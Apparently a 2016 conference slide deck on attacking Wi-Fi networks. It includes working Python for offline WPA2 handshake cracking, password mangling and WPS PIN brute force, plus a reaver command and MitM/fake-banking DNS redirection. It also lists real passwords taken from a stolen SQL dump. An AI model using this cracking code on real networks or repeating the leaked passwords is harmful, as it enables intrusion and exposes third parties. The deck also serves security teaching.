Modern Approaches to Wi-Fi Attacks: Attacker View

BY KONRAD JĘDRZEJCZYK

Posted: 18-Jan-2016

Whoami

• Certified Offensive Security Wireless Professional (OSWP)

• Information Security Incident Response Analyst

Previously:

• Infrastructure Risk Analyst

• Security Incident Manager

• Information Security Forensic Expert

Agenda

• WPA/WPA2 – is the hashing algorithm so insecure as we are led to believe?

• WPS – Weakest Possible Security approach

• OpenWRT = Wormhole attack + MitM +3G

• We're in! What next?

WPA/WPA2 – is the hashing algorithm so insecure as we are led to believe?

WPA/WPA2 Connection

Four-way handshake between the Supplicant (Client) and the Authenticator (AP), as shown in the slide's sequence diagram:

1. Authenticator → Supplicant: random number ANonce (nonce generated by the authenticator) and the authenticator MAC.

2. Supplicant → Authenticator: random number SNonce (nonce generated by the supplicant), Message Integrity Code (MIC) and security parameters (RSN).

3. Authenticator → Supplicant: the random number is resent, with key data encrypted by the PTK.

4. Supplicant → Authenticator: confirm that both PTK and GTK are installed.

Keys: the Pairwise Master Key (PMK) is derived from the pre-shared passphrase and the SSID; the Pairwise Transient Key (PTK) is derived from the PMK, both nonces and both MAC addresses, and its first 128 bits key the MIC. The PMK itself is never sent, so someone who captures the exchange can only test candidate passphrases offline against the MIC.
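To make the question in the section title concrete, here is the key derivation behind the handshake above and the offline dictionary attack it enables, as an added example (not code from the slides). It assumes a constructed handshake: the SSID "DefCampAP", client MAC 00:11:22:33:44:55, fixed nonces and a message-2 EAPOL frame built in the code; the BSSID 0A:0B:0C:0D:0E:0F is the one the deck's reaver line uses. The PBKDF2 check value for "password"/"IEEE" is the test vector from the 802.11i standard.

```python
"""WPA2-PSK key derivation and the offline attack on a captured 4-way handshake.

Added illustration, not code from the original slides.  Every handshake value
below (SSID, MAC addresses, nonces, EAPOL frame) is constructed for the example;
nothing was captured from a real network.
"""
import hashlib
import hmac
from typing import Optional


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    # 256 bits is two SHA-1 output blocks, so one guess costs 2 * 4096 HMAC-SHA1
    # calls before the PTK and MIC are even computed; this is what bounds the
    # kH/s figures on the entropy slide.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    # IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3,
    # concatenated and truncated to 64 bytes.
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion",
    #               min(AA, SPA) || max(AA, SPA) || min(ANonce, SNonce) || max(ANonce, SNonce))
    # KCK = PTK[0:16] (keys the MIC), KEK = PTK[16:32] (wraps the GTK in message 3),
    # TK = PTK[32:48] (CCMP data key).
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    # Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame with the
    # MIC field zeroed)[0:16].  Version 1 (WPA/TKIP) uses HMAC-MD5 instead.
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


# Constructed handshake parameters (assumptions for the example).
SSID = "DefCampAP"
AP_MAC = bytes.fromhex("0a0b0c0d0e0f")       # the BSSID from the slide's reaver line
CLIENT_MAC = bytes.fromhex("001122334455")
ANONCE = bytes(range(0, 32))
SNONCE = bytes(range(32, 64))
# RSN IE as the supplicant sends it in message 2: CCMP group/pairwise cipher, PSK AKM.
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    # EAPOL-Key frame (802.1X header + RSN key descriptor).  The MIC is computed
    # over the whole frame with the 16 MIC bytes set to zero, which is also the
    # form a cracker keeps after parsing a capture.
    key_info = 0x010A  # bit 8 MIC present, bit 3 pairwise, bits 0-2 = 2 (HMAC-SHA1 MIC, AES key wrap)
    body = (
        bytes([2])                        # descriptor type 2: RSN key descriptor
        + key_info.to_bytes(2, "big")
        + (16).to_bytes(2, "big")         # key length (CCMP)
        + (1).to_bytes(8, "big")          # replay counter
        + snonce                          # key nonce (32 bytes)
        + b"\x00" * 16                    # key IV
        + b"\x00" * 8                     # key RSC
        + b"\x00" * 8                     # reserved
        + mic                             # key MIC (16 bytes)
        + len(RSN_IE).to_bytes(2, "big")  # key data length
        + RSN_IE
    )
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body  # 802.1X v2, type 3 = EAPOL-Key


def capture_handshake(real_passphrase: str) -> dict:
    # Stand-in for airodump-ng: what the attacker holds after sniffing messages 1
    # and 2 (possibly after a deauth-forced reconnect): both MACs, both nonces,
    # the zeroed message-2 frame and the MIC the supplicant put on it.
    pmk = derive_pmk(real_passphrase, SSID)
    ptk = derive_ptk(pmk, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    frame = build_msg2(SNONCE)
    return {"ssid": SSID, "aa": AP_MAC, "spa": CLIENT_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": frame, "mic": eapol_mic(ptk[:16], frame)}


def crack_handshake(hs: dict, wordlist) -> Optional[str]:
    # The offline attack: per candidate, PBKDF2 -> PTK -> MIC, compare with the
    # captured MIC.  No further traffic to the AP is needed, so nothing on the AP
    # can rate-limit it; only the passphrase's entropy matters.
    for candidate in wordlist:
        pmk = derive_pmk(candidate, hs["ssid"])
        ptk = derive_ptk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol"]), hs["mic"]):
            return candidate
    return None


if __name__ == "__main__":
    hs = capture_handshake("Paulina2016!")  # the cracker never reads this value
    print(crack_handshake(hs, ["paulina", "Paulina", "paulina!", "Paulina2016!", "qwerty"]))
```

Run as a script it recovers "Paulina2016!" from a five-word list. The numbers on the entropy slide come from derive_pmk: each candidate costs 8192 HMAC-SHA1 calls before the four PRF calls and one MIC, which is why the per-guess cost is measured in tens of kH/s per GPU rather than the GH/s seen for unsalted fast hashes.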

WPA/WPA2 Connection – 802.11 state machine

State 1: Unauthenticated, Unassociated

State 2: Authenticated, Unassociated

State 3: Authenticated, Associated

Transitions: Authentication (1 → 2), (Re)association (2 → 3), Disassociation (3 → 2), Deauthentication (2 → 1 or 3 → 1).

Basic Package

Airodump-ng

OPENWRT WILL TURN CHEAP HARDWARE INTO YOUR BEST WIFI CARD

Airgraph-ng

WPA/WPA2 Password Entropy

X = C^n

Where:

X - number of combinations

C - number of characters in the charset

n - password length (n >= 8, the WPA/WPA2 minimum)

Example:

8-character lowercase alpha password, charset [a-z] or [A-Z] (one case, not both):

26^8 = 208827064576

Example rate for a Radeon HD6850 OC: 49 kH/s.

Time to exhaust the keyspace:

Hardware                          n  Charset                                 Time
Single R290 (~140 kH/s)           8  [0-9] = 10                              12 minutes
                                  8  [a-z] or [A-Z] = 26                     17 days
                                  8  [a-z + 0-9] or [A-Z + 0-9] = 36         233 days
                                  9  [a-z] or [A-Z] = 26                     1 year and 83 days
                                  9  [a-z + 0-9] or [A-Z + 0-9] = 36         23 years
                                  8  a-z + A-Z + 0-9 = 62                    50 years
12 x R270 (12 x ~100 kH/s)        8  [a-z] or [A-Z] = 26                     2 days
                                  8  [a-z + 0-9] or [A-Z + 0-9] = 36         27 days
                                  9  [a-z] or [A-Z] = 26                     52 days
Single i5 CPU (~3.3 kH/s,         8  [a-z] or [A-Z] = 26                     2 years and 1 month
depending on version)

WPA/WPA2 Entropy in Practice

Left column: candidate passwords generated from the base word "paulina" by simple mangling rules:

paulina  Paulina  paulina!  Paulina!  Paulina!@#  PaulinA!@#

paulina0  Paulina0  paulina0!  Paulina0!  PaUliNa0!

paulina1  Paulina1  paulina1!  Paulina1!  P@ulin@1!

(...)  (...)  (...)  (...)  Paulina2o15!

paulina9  Paulina9  paulina9!  Paulina9!  paulinA1989!  paulina!-!

paulina10  Paulina10  paulina10!  Paulina10!  paulina19890101

paulina11  Paulina11  paulina11!  Paulina11!  89Paulina!

(...)  (...)  (...)  (...)  1paulina1

paulina99  Paulina99  paulina99!  Paulina99!  PaUlInA  .paulina

paulina1970  Paulina1970  paulina1970!  Paulina1970!  paulinapaulina

paulina1971  Paulina1971  paulina1971!  Paulina1971!  KonradPaulina

(...)  (...)  (...)  (...)  !!!PAULINA!!!

paulina2016  Paulina2016  paulina2016!  Paulina2016!  PaulinaDefCamp

Right column: rows (id, password) from the leaked table:

(15003, 'demiano7'), (15004, 'Lampka'), (15005, 'paradyne'), (15006, 'darek1054'), (15007, 'bandzior2911'), (15008, 'Ruthless blade'), (15009, 'SzYbKi'), (15011, 'andziulka19994'), (15012, 'kasiq10'), (15013, 'diabelskapam'), (15014, 'Janosik_13'), (15015, 'Sztukens'), (15016, 'superrolnik'), (15017, 'Henry102'), (15023, 'aramil23'), (15024, 'mariusz22')

Real passwords from a stolen and publicly available SQL file: www.pobieramy24.pl.sql
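The left column above is what a mangling rule set produces from one base word. The generator below is an added example, not the author's wordlist or tooling; its stages (case, leet, numeric suffix, punctuation) are an assumption chosen to reproduce the slide's patterns, and it yields Paulina2016!, P@ulin@1!, PaUlInA and !!!PAULINA!!! among 4,736 candidates per base word.

```python
"""Rule-based candidate generation of the kind the slide shows for "paulina".

Added illustration, not the author's tooling; the rule set is an assumption.
"""
from typing import Iterable, Iterator, List

# Leet substitutions kept to what the slide shows (P@ulin@1!).
LEET = str.maketrans({"a": "@", "A": "@", "o": "0", "O": "0"})


def case_variants(word: str) -> Iterator[str]:
    yield word.lower()           # paulina
    yield word.capitalize()      # Paulina
    yield word.upper()           # PAULINA
    yield "".join(c.upper() if i % 2 == 0 else c.lower() for i, c in enumerate(word))  # PaUlInA


def leet_variants(word: str) -> Iterator[str]:
    yield word
    yield word.translate(LEET)


def suffixes(years: Iterable[int] = range(1970, 2017)) -> Iterator[str]:
    yield ""                     # bare word
    for n in range(100):         # 0..99
        yield str(n)
    for year in years:           # 1970..2016
        yield str(year)


def decorations(word: str) -> Iterator[str]:
    yield word
    yield word + "!"
    yield "!" + word + "!"
    yield "!!!" + word + "!!!"


def mangle(base: str) -> Iterator[str]:
    # Cartesian product of the rule stages: case -> leet -> suffix -> decoration,
    # so "Paulina" + "2016" + "!" comes out as Paulina2016!.
    for cased in case_variants(base):
        for leeted in leet_variants(cased):
            for suffix in suffixes():
                yield from decorations(leeted + suffix)


def build_wordlist(bases: Iterable[str]) -> List[str]:
    # dict.fromkeys keeps first-seen order while dropping duplicates, so a base
    # word listed twice (or two bases that collide) does not inflate the list.
    return list(dict.fromkeys(c for b in bases for c in mangle(b)))


def candidates_per_base() -> int:
    # Upper bound per base word: 4 cases x 2 leet x (1 + 100 + 47) suffixes x 4 decorations.
    return 4 * 2 * (1 + 100 + 47) * 4


if __name__ == "__main__":
    wl = build_wordlist(["paulina"])
    print(len(wl), wl[:8])
```

At ~140 kH/s a single R290 tests all 4,736 variants of one base word in well under a second, which is the practical answer to the entropy table: the keyspace only matters if the password is not reachable by rules from a name, a word or a leaked list.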

Any Help?

Don’t Underestimate the “Luck Factor”

http://zaufanatrzeciastrona.pl/wp-content/uploads/2014/02/superbowl.jpg

Possible Safeguards

• Use non-standard passwords that are not present in password lists – force the attacker into a brute force

• Think before creating a password

WPS – WiFi Protected Setup

First described by Stefan Viehböck.

“When poor design meets poor implementation.”

Still, there are only 11,000 possible combinations.

reaver -i mon0 -b 0A:0B:0C:0D:0E:0F

PIN structure (example from the slide: 44443338): 8 digits, the last of which is a checksum. The registrar validates the two halves separately: PIN part 1 (4 digits) – 10,000 possibilities; PIN part 2 (3 digits plus the derived checksum) – 1,000 possibilities.

Message flow (reconstructed from the slide diagram):

1. 802.11 Auth, 802.11 Assoc, EAP initiation

2. Send M4; receive M5 if the first half is correct, otherwise NACK → increment 1st half of PIN, 802.11 Deauth, start over

3. Send M6; receive M7 if the second half is correct, otherwise NACK → increment 2nd half of PIN / fix checksum, 802.11 Deauth, start over

4. Dump AP configuration (M7)

Currently Implemented Safeguards

• Limiting the number of attempts that can be made in a given timeframe

• Using a different PIN for every pairing attempt

• Limiting the pairing time

• Disabling WPS …however, there is a good chance that it will be disabled only in the web interface…
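Putting the two WPS slides together: the PIN checksum, the split brute force the message flow describes, and the first safeguard (attempt limiting), as an added example that is neither the author's nor Reaver's code. The registrar is a simulation that only models the M4/M6 ACK-or-NACK behaviour (constructed; it does no WSC crypto), and the target PIN 12345670 is assumed.

```python
"""WPS PIN structure and the split brute force against a simulated registrar.

Added illustration.  SimulatedRegistrar models only the ACK/NACK behaviour that
makes the attack work, plus an attempt-count lock-out; it is not a WPS stack.
"""
from typing import Optional


def wps_checksum(pin7: int) -> int:
    # Checksum digit of a 7-digit WPS PIN (WSC spec): weighted digit sum mod 10.
    # 1234567 -> 0, i.e. the well-known default PIN 12345670.
    acc = 0
    while pin7:
        acc += 3 * (pin7 % 10)
        pin7 //= 10
        acc += pin7 % 10
        pin7 //= 10
    return (10 - acc % 10) % 10


def is_valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


def search_space() -> tuple:
    # Naive: 10^7 (the 8th digit is derived).  Split, as the protocol leaks it:
    # first half 10^4 + second half 10^3 = 11,000 attempts worst case.
    return 10 ** 7, 10 ** 4 + 10 ** 3


class SimulatedRegistrar:
    """AP-side behaviour as the attacker sees it: a wrong first half is rejected
    with NACK after M4, a wrong second half with NACK after M6.  lockout_after
    models the 'limit attempts per timeframe' safeguard (a real AP locks for a
    period; here it simply stops answering)."""

    def __init__(self, pin: str, lockout_after: Optional[int] = None):
        assert is_valid_pin(pin)
        self._pin = pin
        self.lockout_after = lockout_after
        self.failures = 0
        self.locked = False
        self.m4_count = 0
        self.m6_count = 0

    def _answer(self, ok: bool) -> bool:
        if not ok:
            self.failures += 1
            if self.lockout_after is not None and self.failures >= self.lockout_after:
                self.locked = True
        return ok

    def m4(self, first_half: str) -> bool:
        # True: AP answers M5 (digits 1-4 correct).  False: NACK.
        if self.locked:
            raise RuntimeError("WPS locked")
        self.m4_count += 1
        return self._answer(first_half == self._pin[:4])

    def m6(self, second_half: str) -> bool:
        # True: AP answers M7 with its configuration (digits 5-8 correct).  False: NACK.
        if self.locked:
            raise RuntimeError("WPS locked")
        self.m6_count += 1
        return self._answer(second_half == self._pin[4:])


def split_bruteforce(reg: SimulatedRegistrar) -> Optional[str]:
    # Reaver-style loop: fix the first half via M4/NACK, then the second half via
    # M6/NACK, recomputing the checksum digit for each second-half guess.
    try:
        first = None
        for i in range(10_000):
            if reg.m4(f"{i:04d}"):
                first = f"{i:04d}"
                break
        if first is None:
            return None
        for j in range(1_000):
            pin = first + f"{j:03d}"
            pin += str(wps_checksum(int(pin)))
            if reg.m6(pin[4:]):
                return pin
        return None
    except RuntimeError:  # lock-out hit: the attack stalls until the AP unlocks
        return None


if __name__ == "__main__":
    ap = SimulatedRegistrar("12345670")
    print(split_bruteforce(ap), ap.m4_count + ap.m6_count, "attempts")
    print(split_bruteforce(SimulatedRegistrar("12345670", lockout_after=10)))
```

Against 12345670 the split search needs 1,235 M4 and 568 M6 exchanges; with lock-out after ten failures the same loop returns nothing, which is why attempt limiting, unlike with the offline WPA2 attack, actually helps here, provided the lock is enforced by the radio side and not only shown in the web interface.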

OPENWRT = WORMHOLE ATTACK + MITM + 3G

OpenWrt – Tool for Attacker

Supported hardware: http://wiki.openwrt.org/toh/start

Call to Arms

Post-Analysis

OpenWrt – Everything You Need

• airodump-ng

• airbase-ng

• airdecap-ng

• airmon-ng

• aireplay-ng

• airserv-ng

• tkiptun-ng

• sslstrip

• tcpdump

• ettercap

• … screen

Diagram: attacker ("You") → comm-link → OpenWRT device → wireless access point (AP) → switch → target network (FTP server, database server, mail server, laptop, smart phone).

Classic MitM Attack

Diagram: Victim ↔ OpenWRT (Attacker) ↔ AP ↔ Internet; the attacker sits on the path and sees the victim's Internet data.

We're in! What next?

Social Engineering Toolkit

When We Want More: Hydra

…or…

DNS redirection (diagram):

Before: Victim → AP/Router → Legitimate DNS → Online Banking

After: Victim → AP/Router → Attacker DNS → Fake Online Banking, with the MitM session data fed to the attacker

...and then:

What Can We Do about This?

http://www.aliexpress.com/item-img/Wi-Fi-Rm-Pro-Smart-home-Automation-Intelligent-Controller-Wireless-Smart-Remote-Controller-For-iPhone-6/32270548754.html

Thank You

• Q&A